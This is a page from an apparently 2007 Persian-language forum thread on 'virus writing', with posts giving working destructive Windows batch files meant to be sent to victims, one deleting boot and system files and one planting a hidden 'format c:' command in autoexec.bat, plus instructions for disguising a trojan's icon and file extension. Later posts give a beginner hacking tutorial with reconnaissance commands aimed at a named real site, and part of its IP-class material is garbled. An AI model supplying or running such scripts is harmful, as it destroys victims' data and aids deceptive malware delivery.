تبلیغات :
ماهان سرور
آکوستیک ، فوم شانه تخم مرغی ، پنل صداگیر ، یونولیت
دستگاه جوجه کشی حرفه ای
فروش آنلاین لباس کودک
خرید فالوور ایرانی
خرید فالوور اینستاگرام
خرید ممبر تلگرام

[ + افزودن آگهی متنی جدید ]

صفحه 11 از 17 اولاول ... 789101112131415 ... آخرآخر
نمايش نتايج 101 به 110 از 169

نام تاپيک: ويروس نويسي و انتي ويروس نويسي

Banned
    تاريخ عضويت
    Mar 2007
    محل سكونت
    Forum.p30world

پيش فرض

در يکی از مصاحبه هايه بيل با نيويورک تايمز بيل گفته بود که ويستا فقط برايه بسته کردن دهن مردم و به عنوان يک استراحت گاه برايه مايکرسافت هستش. و برايه اینکه بتونن با ويستا فاصله 11 سال بين XP و وينا رو پر کنن. تا مايکرسافت بتونه بهتر و راحت تر رويه وينا کار کنه. و به این نکته هم توجه داشته باش که همين برنامه نويس ها و ويروس نويس ها مديون همين مايکروسافت هستند که برنامه خوب و عظيمی به نامه VB ساخته

Banned
    تاريخ عضويت
    Mar 2007
    محل سكونت
    Forum.p30world

پيش فرض

با سلام به علت شركت در مسابقات مدتي نبودم و فكر كنم تا كنكور 86 هم نباشم
    بهر حال دورا دور اين متلب رو چك ميكنم از اقاي devilhell هم تشكر ميكنم. اگر مطلبي داري در باره ويروس نويس هاي بزرگ دنيا بزاريد تا بعضي ها متوجه بشن كه مدرك كه هيچي اصلا اونا چند سالشون بوده .ويروس ساسر كه يادتون مياد
    در باره mcse , mcsd هم بايد بگم كه اينا ربطي به هم ندارن يكي مردكبرنامه نويسي و يكي مديريت شبكه
    قول ميدم كه حتما شروع به يك ويروس نويسي كنم هر چند تئوري باشه
    در ضمن من صرفا ويروس نويس نيستم و نميخوام که ويروس بنويسم. من فقط از این فرصت استفاده کردم تا بتونم خودمو بيشتر با .... آشنا کنم. و يه تمرينی برام بشه. و .... رو هم برايه این دوست دارم که برنامه نويسی تحت شبکه رو بهم ياد ميده و هم يه مدرک بين الملّلی هستش

Banned
    تاريخ عضويت
    Mar 2007
    محل سكونت
    Forum.p30world

پيش فرض

در ضمن من صرفا ويروس نويس نيستم و نميخوام که ويروس بنويسم. من فقط از این فرصت استفاده کردم تا بتونم خودمو بيشتر با .... آشنا کنم. و يه تمرينی برام بشه. و .... رو هم برايه این دوست دارم که برنامه نويسی تحت شبکه رو بهم ياد ميده و هم يه مدرک بين الملّلی هستش
    در ضمن من صرفا ويروس نويس نيستم و نميخوام که ويروس بنويسم. من فقط از این فرصت استفاده کردم تا بتونم خودمو بيشتر با VB آشنا کنم. و يه تمرينی برام بشه. و MCSD رو هم برايه این دوست دارم که برنامه نويسی تحت شبکه رو بهم ياد ميده و هم يه مدرک بين الملّلی هستش

Banned
    تاريخ عضويت
    Mar 2007
    محل سكونت
    Forum.p30world

پيش فرض

سلام دوستان امروز با یه آموزش بسیار خفن اومدم
    این ویروس قابلیتی که داره اینه که هیچ آنتی ویروسی نمی تونه در برابرش کاری کنه و بعد از ری استارت ویندوز فرمت میشه
    برای ساختن این ویروس مراحل زیر رو انجام بدید
    به نوت پد رفته و این عبارت رو بنویسید
    del autotexec.bat
    del config.sys
    cd winnt
    del system.ini
    del win.ini
    بعد اونو با فرمت bat سیو کنین و برای قربانی بفرستین

Banned
    تاريخ عضويت
    Mar 2007
    محل سكونت
    Forum.p30world

پيش فرض

آیکون و پسوند تابلوی ترجان ها را به هر چی که دوست دارید [هک]
    برای اینکار 2 راه موجود می باشد که من این 2 راه را برای شما میگم:
    راه اول :
    یک عدد فایل تروجان آماده کنید...
    یه wordpad باز کنید ( می تونید رو دسکتاپ راست کلیک کنید به new برید و یه wordpad documernt باز کنید .
    فایل تروجان رو کپی کنید و توی wordpad پیست کنید یا میتونید فایل رو با ماوس بکشید و تو صفحه word رها کنید .
    حال همون فایلی رو که تو word گذاشتید را انتخاب کنید . یعنی روش تک کلیک کنید
    بعد به edit برید و بعد به package object و روی برگه edit package کلیک کنید حالا در پبجره باز شده به edit برید و copy package رو بزنید .
    در آخر هم به یکی از فلودر ها یا درایوها برید راست کلیک کنید و paste رو بزنید .
    به همین آسونی فایل تروجان exe یا هر اسم دیگری را میتونید بی نام و نشون کنید و علاوه بر اینکه ایکون فایل شبیه این بچه مثبتا میشه به همین راحتی هم پسوندشو لو نمی ده اصلا پسوندی در کار نیست .
    راه دوم :
    بر روی فایل تروجانی کا آماده کرده اید راست کلیک کنید وگزینه create shortcut را بر گزینید . حالا یه فایل از همون تروجان با اسم shortcut درست شده است حالا بر روی shortcut آن راست کلیک کنید و گزینه Properties را انتخاب کنید حال در پنجره باز شده جدید در بالای آن گزینه shortcut را انتخاب کنید و بعد بر روی گزینه change icon کیک کنید و در پنجره باز شده 100 ، 200 تا آیکون ظاهر میشود حالا هر کدوم را که دوست دارید انتخاب کنید و یا می تونید با زدن گزینه browse آیکنی که خود شما دارید را برگزینید

Banned
    تاريخ عضويت
    Mar 2007
    محل سكونت
    Forum.p30world

پيش فرض

یك ويروس براي فرمت كردن درايو C شخص مورد نظر [ويروس نويسی]

برنامه NotePad رو باز كنين بعد فرمان زير رو توش كپي و پيست كنيد:

@echo off
    call attrib -r -h c:autoexec.bat >nul
    echo @echo off >c:autoexec.bat
    echo format /autotest c:/q>nul >>c:autoexec.bat
    call attrib +r +h c:autoexec.bat >nul
    exit

حالا فايل را با پسوند bat ذخيره كنين. مواظب ياشين كه فايل رو اجرا نكنين چون كل اطلاعات درايو سي شما پاك مي شه!

اين فايل چه كار مي كنه؟
    اول كل اطلاعات موجود تو فايل autoexe.bat رو پاك مي كنه بعد كد format /autotest c:/q رو توش مي زاره وقتي هدف شما كامپيوتر رو ريست و دوباره راه اندازي كنه اين كد اجرا مي شه و درايو سي فرمت مي شه!

------------------------
    راستي اگه هم بخواين تعداد و نام پارتيشن مورد نظر رو با كمي تغيير توي فرمان ها مي تونين تعيين کنين

Banned
    تاريخ عضويت
    Mar 2007
    محل سكونت
    Forum.p30world

پيش فرض

هکرها و دسته بندی حملات آنها [هک]

انواع هکرها:
    1- گروه نفوذگران کلاه سفید: (white hat hackers) : هر کسی که با دانش خود بتواند از سد موانع امنیتی یک شبک بگذرد و به داخل شبکه راه پیدا کند اما اقدام خرابکارانه ای انجام ندهد را یک هکر کلاه سفید می خوانند. خب حتما می گویید عجب ترجمه سختی ما که هیچ نفهمیدیم. عجله نکنید. اینم مثال راحتش. تصور کنید دانشجویی که در یک دانشگاه درس می خونه و می دونه تمامی لیست حضور و غیاب و نمرات دانشجوها در کامپیوتری در اتاق شبکه دانشگاه قرار داره. حالا این دانشجوی کنجکاو ما برای اینکه سر و گوشی آب داده باشه مدتها روی شبکه دانشگاه کار می کنه و از راه های مختلف( که خارج از بحث و حوصله این مقاله است و اگر بخوام راستش رو بگم میشه 100 ها کتاب راجعش نوشت) وارد اون شبکه میشه. یعنی به طور معمول هیچ دانشجویی حق نداره بتونه نمراتش رو ببینه ولی این پسر ناقلای ما یه جورایی وارد شبکه میشه و نمراتش رو می بینه و همچنین حضور و غیابش رو. خب این پسر ناقلا یک هکره. چون این پسر ناقلا فقط نمرات رو می بینه و دست کاری نمی کنه(لابد وجدانش اجازه نمی ده) یک هکر کلاه سفید میشه.
    به عنوان مثالی دیگر هکرهای کلاه سفید متخصصین شبکه ای هستند که سوراخهای امنیتی شبکه را پیدا می کنند و به مسوولان گزارش می دهند. مثلا این دانشجوی ناقلا می تونه بره به مسوول شبکه بگه که چطوری وارد سیستمش شده( چون حتما یه ضعفی داشته دیگه) بعدش اونا هم بهش قاقالیلی میدن!

2-گروه نفوذگران کلاه سیاه (Black hat hackers) : به این گروه کراکر –Cracker- می گویند. این افراد آدمهایی هستند که با دانشی که دارند وارد کامپیوتر قربانی خود شده و به دستکاری اطلاعات و یا جاسوسی کردن و یا پخش کردن ویروس و غیرو می پردازند( در انتهای همین مقاله انواع راه های نفوذگری بحث شده). مثلا همون دانشجوی ناقلای مثال بالا اگر بره داخل شبکه و نمراتش رو عوض کنه و به خودش همش بیست بده و یا ایمیل دختر رییس دانشگاه رو از اون تو کش بره و نامه نگاری عاشقانه راه بندازه و یا اصلا روی تمام سیستمهای دانشگاه ویروس بندازه دیگه میشه یک کراکر. پس آقایون و خانومها دانش یک شخص می تونه در جهت مثبت به کار بره یا منفی. لب کلام اینکه اگر اون شخص آدم خوبی بود و تو شبکه دست کاری نکرد بهش میگن کلاه سفید اگر شرور بود و عشق خرابکاری بهش می گن کلاه سیاه. مثل یه آدمی تصور کنید که کشتی گیره. اگر هوای ضعیف ضعفا رو داشته باشه بهش میگن پهلوون اما اگر قلدر بازی واسه همه در بیاره مردم بهش می گن لات و چماق کش!

3-گروه نفوذگران کلاه خاکستری (gray hat hackers) : خب شاید سخت ترین کار توصیف حوزه این گروه از نفوذگرهاست. به این نفوذگرها بعضا whacker هم می گویند( البته زیاد مصطلح نیست فقط برای اطلاع بدانید). این گروه از نفوذگرها بنا به تعریفی حد وسط دو تعریف گذشته هستن. یعنی گاهی شیطنت می کنن و توی سیستم خرابکاری می کنن و گاهی خرابکاری نمی کنن! یعنی اینکه هم کلاه سفیدن هم کلاه سیاه واسه همین رنگشون رو قاطی کردن شده خاکستری! بنا به تعریف دیگه کلاه خاکستری ها شیطونی هاشون هم عامه پسنده یعنی اگر بخوان خرابکاری کنن در جهت اطلاع عموم انجام میدن و به قول معروف فی سبیل الله و برای مردم. مثلا اون دانشجوئه مثال بالا اگه بیاد یه نسخه از لیست حضور و غیاب رو به ایمیل تمام دانشجویان دیگه بزنه و بگه برید حالا حالش رو ببرید و ببینید هرکی چقدر غیبت داره و نمره تحقیقش چند شده.
    4- گروه نفوذگران کلاه صورتی ( pink hat hackers): خب این دسته بندی به ندرت دیده شده و اکثر مواقع کلاه صورتی ها رو جزیی از کلاه سیاه ها می دونند. به زبان شیرین فارسی اینها همون جوجه هکرها هستند! این افراد آدمهای کم سوادی هستند که فقط با چند نرم افزار به خرابکاری و آزار و اذیت بقیه اقدام می کنن. مثلا شماها رو توی مسنحر یاهو بوت می کنن و یا توی چت رومها خرابکاری می کنن و یا با نرم افزارهای آماده ایی مثل ساب سون و غیرو اقدام به هک کردن بقیه می کنن و از این قبیل. بنابراین به کلاه صورتی ها می گیم جوجه هکر!

انواع حمله هکرها:
    - استراق سمع (interception) : در این روش نفوذگر موفق شده که در حین تبادل اطلاعات گوش کند. وی مخفیانه این اطلاعات را مورد نظر داشته و اطلاعات مورد نیاز را برای خودش نسخه برداری می کند. تکنیک ها و روش های بسیاری را هکرها در استراق سمع به کار می برند که یکی از آنها همان sniff بود که در مقاله چند روز قبل کوتاه به آن اشاره کردم. بگذارید مثالی بزنم تا 2 زاریتان کاملا بیفتد. شما در حال مخ زدن در روی اینترنت هستید و شبهای متمادی وقت گذاشتید مخ این دختره رو بزنید و شمارش رو بگیرید. در حال چت کردن هستید که بالاخره عروس خانوم شماره رو به شما میده و شما خوشحال که فردا حتما بهش زنگ می زنید. اما شمای بدبخت نمی دونید که یه هکری ناقلایی کامپیوتر شما رو زیر نظر داره و کلیه چت های شما و اون خانوم رو داره می بینه. اون هکره داره استراق سمع می کنه. حرفاتون براش دلچسب نیست ولی به محض دیدن اون شماره تلفن براش جالب توجه میشه! اینکه شماره تلفن رو یادداشت می کنه و فردا زنگ می زنه به دختره و همون صبحش قرار می گذاره و عشق و حالی که نگو. سر بدبخت شما هم کلاه میره. این جوریاس دیگه. باید زندگی کرد!!!
    - دستکاری اطلاعات (modification ): نفوذگر عزیزمون موفق به تغییر اطلاعات میشه. در اینجا بدون اطلاع از قربانی بدبخت, هکر ما اطلاعات رو تغییر میده. مثلا یکی بیاد و بره داخل لیست نمرات یک دانشگاه و نمراتش رو همچین یک حال اساسی بهشون بده و معدلش از 13 بشه 18!

- افزودن اطلاعات و جعل ( fabrication ): در این روش نفوذگر اطلاعات رو به سرقت نمی بره و یا جایگرین نمی کنه بلکه به اطلاعات فقط اطلاعات دیگری رو اضافه می کنه. مثلا فرض کنید مدیر شرکتی نامه ای می زنه به مسوول خرید و لیست خریدی برای شرکت میده. حال شما که هکر بسیار زرنگی هستید این نامه رو جعل کرده و یه سری چیزها بهش اضافه می کنید مثلا می نویسید که خرید یک میز جدید برای آقایی که خودتون باشید! و بعد نامه رو می فرستید برای مامور خرید. مامور خرید بی نوا هم میره لیست رو تهیه می کنه. به واقع شما در اینجا اطلاعات حاوی اون نامه رو همون طور که هست می گذارید باشه ولی بهش مطالب جدید هم اضافه می کنید. هرچند می شه این اقدام رو در زیر شاخه modification آورد اما میگم شما زیاد درگیر گروه بندی نشید بلکه مفهوم رو متوجه بشید که به واقع هدف اصلی این مقاله همینه.
    - حمله از نوع وقفه ( interruption): در این نوع حمله هکر باعث اختلال در شبکه و تبادل اطلاعات میشه. تکنیک های بسیاری وجود داره برای هکرها اما 2 مثال بسیار مشهود که نتیجه اش برای یک وبگرد به وضوح مشخصه و در نتیجه همین حملات صورت می گیره یکی در چت رومهاست که گاهی می بیند کسی کامپیوتر سرور چت رو وقفه می ندازه و دیگر شما قادر به چت در آن چت روم نیستید و یا اینکه حتما شنیده اید وقتی هکری به یک سایت حمله کرده و باعث کندی آن سرور شده و این باعث می شود که اگر سایت در عرض 5 ثانیه می بایست در مرورگر شما ظاهر شود یا اصلا قابل بارگزاری نیست (سایت به قول معروف لود نمی شود) و یا اینکه بعد از مثلا 1 دقیقه ظاهر می شود. اینگونه حملات بلای جان کسانی است که مسوول یک سایت و یا شبکه هستند چرا که کندی شبکه همانا و سر و صدای مدیر در آمدن همانا.

Banned
    تاريخ عضويت
    Mar 2007
    محل سكونت
    Forum.p30world

پيش فرض

اینم از اینا. بعدن ميام بيشتر مطلب ميزارم. ديگه نميزارم این تاپيک بدون مطلب بمونه

Banned
    تاريخ عضويت
    Mar 2007
    محل سكونت
    Forum.p30world

پيش فرض

آموزش ساخت یک ویروس که اگر اجرا بشه پس از ریست ، کامپیوتر دیگه بالا نمیاد... [ويروس نويسی]

خوب اول یک
    Notepad یا همان Txt Document
    باز می کنید بعد دستور زیر را توی اون کپی میکنید و با فرمت
    Bat
    سیو میکنید...
    C:
    del autoexec.bat
    del config.sys
    cd winnt
    del system.ini
    del win.ini

مثل:
    Virus.bat
    به جای کلمه ویروس هم اسم مورد نظر را بگذارید...

Banned
    تاريخ عضويت
    Mar 2007
    محل سكونت
    Forum.p30world

پيش فرض

آموزش کامل انواع هک [عمومي]

سلام اینم اموزش کامل انواع هک که شامل اموزش هک کردن سایت و وبلاگ هم میشه و به یه سری سوالات کلیدی شما هم جواب داده شدهمعمولا سوالهای شما در اولش ايناست ۱-هک چيه آيا وارد شدن به يه کامپيوتر هک محسوب ميسه؟ ۲-وقتی يه کامپيوتر خاموشه ميشه هکش کرد؟ ۳-آيا برای اينکه يک هکر شويم بايد خودمان يه بار هک شده باشيم؟ البته سوال که زياده ولی معمولا همه ی شماها همين ها رو میپورسين. حتما تو اين چند روزه در باره ی اين ويروس جديده خبرهايی شنيده ايد.يکيش وب لاگ خودم.که بعد از اون ماجرا ماکروسافت گفت patchمخصوص ويندوز ها ی گوناگون رو نصب کنيد.خوب اين يعنی چي؟يعنی اين که سيستم عامل ها را انسان ها درست ميکنن بنابراين خطای آن ميشه گفت ۵۰تا۵۰ است در نتيجه به اين خطاها bugگفته ميشود که هر شرکت تا اين سوتی ها رو ديده سريعا اين patchرو برای ماسمالی کردن و در امن ماندن از دست هکرها پخش ميکنه.خوب ببينيد بعضی از هکرها اصلا اين وظيفه را دارند که ضعف اين شرکتو نشان بدم البته ما نوع های مختلفی داريم که در حوصله اين مقاله نميگنجد . به چه چيزهايی برای شروع نياز داريم: ۱-ابتدا زبان Cرا فرابگيريد. برای چي؟برای صحبت با پورتهای مختلف ۲-Dosرا خوب بلد باشيد.برای چي؟برای استفاده از FTP SERVER ۳-دو سيستم عامل داشته باشيد .يکی از خانواده ی ويندوز و ديگری از خانواده ی Unix IP:مهمترين چيز و راحترين چيز در هکه که خيلی راحت به دست مياد و اهميت فوق العاده ای برای Telnetکردن به سايتهای مختلف و دودر کردن اينترنت و.... Whois:تعريف خاصی ندارد اما ميشه گفت اطلاعات هر سايت را به ما ميده Telnet:برای صحبت با ورتها و وارد شدن بهFTPالبته اين تعريف درست و کامل نيست. Port:در زبان فارسی به معنای بندر است خوب حالا کامپيوتر Serverرا جزيره در نظر بگيريد وکه چندين بندر دارد و هرکدام از اين بندرها کاره خاصی ميکنند. بدست آوردن IPخودمان بعد از اتصال به نت: 1-رفتن به CMDويندوز XPويا DOS۹۸وتايپ کردن اين عبارتnetstat -n 2-Clickراست کردن بر روی اون دوپنجره پايين Desktopهمان دو پنجره ای که وقتی به نت وصل هستيم چشمک ميزنه و بعد انتخاب گزينهSatusو زدن Deatilدر بالای پنجره و ديدن IPخودمان در پايين صفحه و IPSERVERدر بالای آن طبقه بندی IP ها: IPها به ۵ کلاسAتاEتقسيم ميشوندکه بر حسب اهميت کلاسAتاCمورد اهميت تر است و ما هر ۵ نوع را برای شما بيان ميکنيم ۱-قالب ۳۲ بيتی کلاس Aاين گونه است۷بيت شبکه و ۲۴ بيت کاربر.اگر IPرا اينگونه فرض کنيمxxx.yyy.zzz.rrrاين کلاس شامل تمام IPهايی ميشود که xxxهای آن بين1تا۱۲۶است.هر گاه پرارزشترين بيت IP آدرس صفر باشد , آدرس از كلاس A است . همانگونه كه مشاهده ميكنيد بخش شبكه اين كلاس قادر به ادرس دهي 127 شبكه ميباشد و ميتواند حدود 17000000 كاربر داشته باشد . بنابراين به اين نتيجه ميرسيم كه ادرسهاي كلاس Aشبكه هاي ستون فقرات اينترنتي هستند . ۲-قالب 32 بيتي كلاس B بصورت زير است : آدرس كاربر(16 بيت) آدرس شبكه(14بيت) 10 هر گاه پرارزشترين بيتهاي IP آدرس10 باشند , آدرس از كلاس B است . همانگونه كه مشاهده ميكنيد بخش شبكه اين كلاس قادر به ادرس دهي 16382 شبكه ميباشد . كه هر يك ميتواند 65534 كاربر داشته باشد . بنابراين به اين نتيجه ميرسيم كه ادرسهاي كلاس B شبكه هاي عظيم اينترنتي هستند كه تمام اين آدرسها امروز تخصيص داده شده اند .اينIPها تمام xxxهايی را شامل ميشوند که عددشان بين128تا۱۹۱است و از کلاسهای پر کاربرد هستند. ۳-قالب 32 بيتي كلاس C بصورت زير است : آدرس كاربر(8 بيت) آدرس شبكه(21بيت) 110 در اين كلاس پرارزشترين بيتها 110 هستند . اين كلاس پر كاربردترين كلاس است . در اين كلاس با توجه به آدرس 21 بيتي شبكه , ميتوان حدود 2000000 شبكه تعريف كرد.و اين کلاس تمام IPهايی را شامل ميشود که xxxهای آنها بين192تا۲۲۳است. ۴-آدرسهاي كلاس D : قالب 32 بيتي كلاس D بصورت زير است : آدرس كاربر(28 بيت) 1110 در اين كلاس پرارزشترين بيتها 1110هستند . و 28 بيت بعدي براي مقاصد گروهي بكار ميروند . ۵-آدرسهاي كلاس D : قالب 32 بيتي كلاس D بصورت زير است : آدرس كاربر(28 بيت) 1110 در اين كلاس پرارزشترين بيتها 1110هستند . و 28 بيت بعدي براي مقاصد گروهي بكار ميروند . خلاصه ای از مطالب بالا: اين هم خلاصه ی مطالب مهم که اگر حوصله خواندن اين کلاسهای IPمسخره را نداريد 1- كلاس A : عدد سمت چپ IP ادرسهاي كلاس A بين 0 تا 127 ميباشد . 2- كلاس B : عدد سمت چپ IP ادرسهاي كلاس B بين 128 تا 191 ميباشد . 3- كلاس C : عدد سمت چپ IP ادرسهاي كلاس C بين 192 تا 223 ميباشد . فعلا تا اینجا رو داشته باشید.
    سلام خوب حالا فکر کنم مفهوم IPقشنگ براتون جاافتاده ميريم سر دستورها بدست آوردن IPيک سايت: در اولين قدم هک چه کلاينت و چه سرور بايد IPرو بدست بياوريم.که برای به دست آوردن IP يک سرور يا سايت ۲ روش وجود دارد البته نرم افزارهای زيادی در اين مورد هست که به موقعش معرفی ميکنم ۱-در CMDويندوزتان برويد و اين عبارتو تايپ کنيدping <Ahref="http://www.domain.com%d9%88%d8%a8%d9%87/" target=_blank>http://www.domain.comوبه/</A> جای domainآدرس اينترنتی سايت خودتونو بنويسيد مثلا در مورد سايت يك سايت قبلا امتحان کردم شده: ping <Ahref="http://www.moaddabfurniture.com/" target=_blank>http://www.moaddabfurniture.com/</A> Pinging <Ahref="http://www.moaddabfurniture.com/" target=_blank>http://www.moaddabfurniture.com/</A> [66.48.76.205] with 32 bytes of data: Request timed out. Request timed out. Request timed out. Replyfrom 66.48.76.205: bytes=32 time=855ms TTL=106 Ping statistics for 66.48.76.205: Packets: Sent = 4, Received = 1, Lost = 3 (75% loss), Approximate round triptimes in milli-seconds: Minimum = 855ms, Maximum = 855ms, Average = 855ms بعد IPاين سايت [66.48.76.205]است.و يه سرس اطلا عات ديگه با همين دستوره کوچولو به دست اومد که بعدن سر موقعش همشو بهتون تو ضيح ميدم. روش دوم۲-همان Whoisکردن است که در اوايل صحبتهايم براتون تعريفش کردم اين راه به نظر شخصی من بهتر از PINGکردنه چون اطلاعات جامع تری رو ميده و يکی از همين سايتها که هر هکری بهش علاقه منده اينه برای ديدنش اينجارو کليک کنيد.و برای Whoisکردن اين عبارتو در اينترنت اکسپلولر تايپ ميکنيم و Enterميزنيم <Ahref="http://www.samspade.org/t/whois?a=xxxxxxxxx%DA%A9%D9%87" target=_blank>http://www.samspade.org/t/whois?a=xxxxxxxxxکه</A> به جای اين ضربدرها آدرس سايت مورد نظر خود را بنويسيد مثلا در مورد همون سايت اين ميشود <A href="http://www.samspade.org/t/whois?a=moaddabfurniture.com" target=_blank>http://www.samspade.org/t/whois?a=moaddabfurniture.com</A> خيلی از شماها حتما فرق اين دو روش را فهميدين در روش Whoisاطلاعات ذيقيمتی رو بدست مياورين در اصل ميشه گفت اين روندها مثل زنجير بهم پيوستن خوب اطلاعاتی که گفتم همونDNS ServerياDomain Serverاست و به وسيله همين DNS Serverو با استفاده از دستور nslookupاطلاعات ذيقيمت تری رو بدست مياوريد. استفاده از دستور مهم nslookup وقتی DNS Serverيک سايتو بدست آورديم با استفاده از روش Whoisکردن که در بالا گفتم و اين آدرس هميشه در سطر آخر ديده ميشود و معمولا به اين شکل است در مورد همون سايت امتحان کردم شد s1.moaddabfurniture.com s2.moaddabfurniture.com خوب حالا شروع ميکنيم اين دستورو در CMDتايپ nslookup وEnterکنيد نتيجه به اين شکل است: *** Can'tfind server name for address 192.168.20.3: Non-exi... *** Can't find server namefor address 192.168.20.1: Non-exi... *** Default servers are not availableDefault Server: UnKnown Address: xxx.xxx.xx.x خوب حالا اين عبارتو تايپ ميکنيم server dns_serverو به جای dns_serverهمون DNS Serverاوليه را تايپ ميکنيم مثلا در مورد همون سايت ميشه server s1.moaddabfurniture.comاگه احيانا به پيام اخطار برخورد کرديد DNS Serverدوم را وارد کنيد فکر کنم متوجه شديد جريان از چه قراره اينبار شما وارد محيط nslookupشديد پس اينجا هم از دستور ها ی متفاوتی پيروی ميکنه که هرکدو اطلاعات خاص خودش ميده که الان من اين دستورها رو ميگم ولی شما از بعضی نتايجش ميتونين اطلاعات ذيقيميتی رو بدست آوريد. set type=any بعدش اينو تايپ کنيدls -d site_name و به جای siteاسم سايتتونو بنويسيد مثلا ls -dmoaddabfurniture.com خوب اگه شماها تا حالا رو يه سايت کارای بالا رو کرده باشين دستتون پره به زبان عاميانه يعنی شما دارين خودتونو شارژ ميکنين برای حمله به سايت قربانی اگه موافق باشيد در بار بعد بريم سر بحث پورتها پس فعلا با اجازه
    سلام مفهوم پورتها به طور کامل و مشخصات آن خوب اين بحث مهمترين کارمونه چون ميخوام پو رتها رو بشناسيم و به اونها تلنت کنيم چون تا وقتی که نفهميم کدوم پورت چه کاری انجام ميده نميتونيم موفق بشيم ۱- پورت‌های 0 تا 1023 : مشهورترين پورت‌ها هستند و معمولا هرکدام برای يک سرويس خاص استفاده می‌شود. با تعدادی از اين پورت‌ها در قسمت های قبل آشنا شده‌ايد. ۲- پورت‌های 1024 تا 49151 : اين سری از پورت‌ها مشخصا با هيچ‌يک از سرويس‌های اينترنتی مرتبط نيستند بلکه وقتی که با يک ابزار شبکه مانند مرورگر اينترنت(مثل Internet Explore يا NetscapeNavigator )، نرم‌افزار ارسال و دريافت E-mail (مثل Outlook يا Edura )، نرم‌افزارهای FTP (مثل WS-FTP يا Cute-FTP ) کار می‌کنيد، يکی از اين پورت‌ها به صورت random باز شده و يک ارتباط با سرور (با توجه به‌نوع سرويس اينترنتی که می‌دهد که يکی از پورت‌های 0 تا 1023 است) برقرار شده و داده‌ها ارسال و دريافت می‌شوند. يعنی پورت شما يکی از پورت‌های اين قسمت است و پورت سرور يکی از پورت‌های بالايی.اين سری پورت‌ها را پورت‌های register شده هم می‌گويند. ۳- پورت‌های 49152 تا 65535 : اين سری از پورت‌ها به‌ندرت استفاده می‌شوند. کاربرد اساسی آنها برای يک سری سرويس‌های خاص اينترنتی است و يا توسط trojanها (که برای ---- کردن کامپيوتر است) به کار میرود. البته خيلی از trojanهای معروف از پورت‌های رديف ۲ هم استفاده می‌کنند و اين تقسيم‌بندی‌ها هميشه برقرار نيست و به‌همين علت است که گاهی پورت‌ها را به دو‌دسته زير 1024 و بالای 1024 تقسيم‌ می‌کنند. فکر کنم الان مفهوم پورت براتون جا افتاد و اما يه مطلب مهم: شما بايد با مدل TCP/IPآشنا باشيد اگه نيسيتيد ياد بگيريد اينم از مقدمات يه هکر شدنه در ضمن من ميخوام آموزشش بدم ميتونين نه کتاب بخرين نه پول آموزشگاه بدين پس آروم آروم من هم به سايت رونق ميدم اما من گفتم و بازم ميگم تايپ فارسی خوب نيست اگه يه شريک مشتی گير مياوردم مطالب بالا رو با هم کامل و دو نفری مشغول باشيم هم شماها بيشتر حال ميکردين هم ما به خدا به هرحال بايد با تنهايی ساخت ولی حتما اين TCP/IPرو ميگم اما گفتم زبان Cرو بريد بيرون ياد بگيريد من نميتونم اينطوری تو وبو بنويسم. پورتهای باز وبسته ی يک سرور را چگونه تشخيص دهيم معمولا اين کارها را نرم افزارها ميکنند نه خود کاربر يه توضيح کوچولو در مورد Whois اگر شما ميخواین Whois کنيد و از همان سايت samspadeاستفاده کنيد شايد جواب نده علتش رو بعدن ميگم اما برای اينکه یه کم بدونين به دليد مسایل دامين و جغرافيايی است پس از اين دستور استفاده کنيد مثلا آخر سايت شما .comداره اونوقت منظورمو ميگيرين اينم دستورش که در اينترنت اکسپلولر تو ضيح دادم . <Ahref="http://www.internic.net/cgi/whois?type=dom...is_nic=xxxxxxxx" target=_blank>http://www.internic.net/cgi/whois?t...is_nic=xxxxxxxx</A> و به جای ضربدر ها آدرس سايتو مينويسيد اينم مخصوص سايتهايی که آخرشون .irداره/http://whois.nic.ir اينم مخصوص اونايی که آخرشون .twو.bizو.cc <Ahref="http://www.tv/en-def-8e33e8cf5e3c/cgi-bin/...xxxxxx&tld=yyyy" target=_blank>http://www.tv/en-def-8e33e8cf5e3c/c...xxxxxx&tld=yyyy</A> و ميخوام در مورد سايت رشد ببينيم خوب اين آدرسشهRoshd.irو به جای xxxxxxهامنويسيم Roshdو به جایyyyyمينويسيم .irفکرکنم الان خوب متوجه شده باشيد. چند نکته مهم در مورد PINGو دستوراتش اگه يادتون باشه اون اولای مقاله به یه سایت Pingکرديم خوب حالا ميخوام اون نتايجی رو که گفتم بعدن بهتون ميگم رو الان بگم چون الان مفهموم هک و خيلی چيزارو يادگرفتين بريم تو کارش چشم دستورشم يه بار ميگم که مجبور نشی دو ساعت بری بالا بگردی دنبالش Ping <A href="http://www.your/" target=_blank>http://www.your/</A> domain or your ip اينم نتيجش ping <A href="http://www.moaddabfurniture.com/" target=_blank>http://www.moaddabfurniture.com/</A> Pinging <Ahref="http://www.moaddabfurniture.com/" target=_blank>http://www.moaddabfurniture.com/</A> [66.48.76.205] with 32 bytes of data: Request timed out. Request timed out. Request timed out. Replyfrom 66.48.76.205: bytes=32 time=855ms TTL=106 Ping statistics for 66.48.76.205: Packets: Sent = 4, Received = 1, Lost = 3 (75% loss), Approximate round triptimes in milli-seconds: Minimum = 855ms, Maximum = 855ms, Average = 855ms خوب اين داره ميگه که زمان رسدن به پکت رو ميگه خودتون ببينيد که به سرعت شما و ترافيک و خطوط شبکه بستگی داره البته من بعضی جاهاش حذف کردم اما عبارت جلوی Replyتايم رسيدن را نشان ميده و يه نکته مهم ديگه اينکه با توجه به سطر آخر ميفهميم lover-hackers.comفعال هست يا نه الان تو مثال بالا فعال است اما اگه عددهای جلوی عبارتهایMinimumوMaximumوAvreageصفر شود اونوقت يعنی فعال نيست. موفق باشيد
    سلام دستور Tracert اين دستور ميگه که از چند تا کامپيوتر بگذريم تا به lover-hackers.comبرسيم دستور رو در CMdبه اين شکل اجرا کنين tracert your domainکه به جای your doaminآدرس سايتو بنويسيد. پورتهای باز کامپيوتر خودمان را ببينيم خوب شما الان چون با مفهوم پورت آشنا هستيد و ميدونيد در هک اساسی ترسن کارها رو پورت انجام ميشه و حتی با ميتوان با باز بودن پورت يک کامپيوتر بهش نفوذ کرد اين خيلی مهمه که پورتهای باز خودتونو ببينيد.از يکی از اين دو دستور استفاده ميکنيم . ۱-درCMDويندوزتان تايپ کنيدnetstat -anکه اين دستور پورتها رو به صورت عدد نشون ميده به خاطر اون numberآخرش ۲-دستور netstat -aمعادل اسمس آن پورت را نمايش ميدهد من قسمتيش واستون ميگم در خط اولش نوشته Protoکه معادل آن است که پروتکل شما TCP or UPDاست بعد ميريم سراغLocal Adress که اونجا هم IPرو نوشته وپورتها رو البته ماله خودتون است و در آخر Stateوضعيت اتصال رو نمايش ميده حالا با استفاده از اينا چيکار کنيم؟خوب ميتونيم ببينيم Trojanروش فعال است يا نه؟ 